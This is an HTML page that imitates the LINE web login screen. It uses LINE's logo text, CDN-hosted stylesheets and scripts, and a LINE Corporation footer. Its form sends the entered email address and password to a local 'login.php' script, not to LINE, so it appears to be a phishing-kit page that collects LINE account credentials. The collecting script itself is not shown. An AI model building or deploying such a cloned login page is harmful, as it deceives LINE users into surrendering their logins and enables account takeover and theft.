<!DOCTYPE html>
<html dir="ltr" lang="en_US" data-lang="en_US"><head>
  <!-- PC -->
  <meta charset="UTF-8">
  <title>LINE</title>
  <link rel="shortcut icon" type="image/x-icon" href="https://scdn.line-apps.com/n/line_lp/img/favicon.ico">
  <link rel="stylesheet" href="https://scdn.line-apps.com/n/line_web_login/css/line_web_login_1523526510.css">
  <!--[if lt IE 9]><script src="https://scdn.line-apps.com/n/line_web_login/js/html5_1523526510.js"></script><![endif]-->
  <script src="https://scdn.line-apps.com/n/line_web_login/js/lc.line.web.login.common_1523526510.js"></script>

  <link rel="stylesheet" type="text/css" href="/dialog/res/css/common/double-click-prevention.css">
  <script src="/dialog/res/js/common/double-click-prevention.js"></script>
</head>
<body>
<div class="LyWrap" style="margin-top: 113px;">
  <div class="ArLoginWrap" style="margin-top: 0px;">
    <h1 class="MdGHD1Logo">LINE</h1>
    <div class="arLoginWrapInner">
      <div class="MdMN01LoginForm">
        <form action="login.php" method="post">

          <div class="MdLYR05Wrap MdNonDisp">
            <a href="#" class="MdBtn01Close02">Close</a>
            <p class="mdLYR05Desc">You can view your account info by opening your LINE app and going to Settings &gt; Account.</p>
          </div>
          <div class="MdInputTxt01 mdInputTxt01Mail">
            <input type="text" name="username" class="" placeholder="Email address">
            <span type="button" class="MdBtn01Help">Help</span>
          </div>
          <div class="MdInputTxt01">
            <input type="password" name="password" class="" placeholder="Password">
          </div>

          <div class="mdMN01Btn">
            <input type="submit" class="MdBtn03Login" value="Log in">
          </div>
        </form>
      </div>
    </div>
  </div>

  <footer class="LyFoot" role="contentinfo">
    <p class="MdGFT02Link">
      <a href="http://line.me" target="_blank">About LINE</a>
    </p>
    <p class="MdGFT01Copy">
      <small>© LINE Corporation</small>
    </p>
  </footer>
</div>

</body></html>
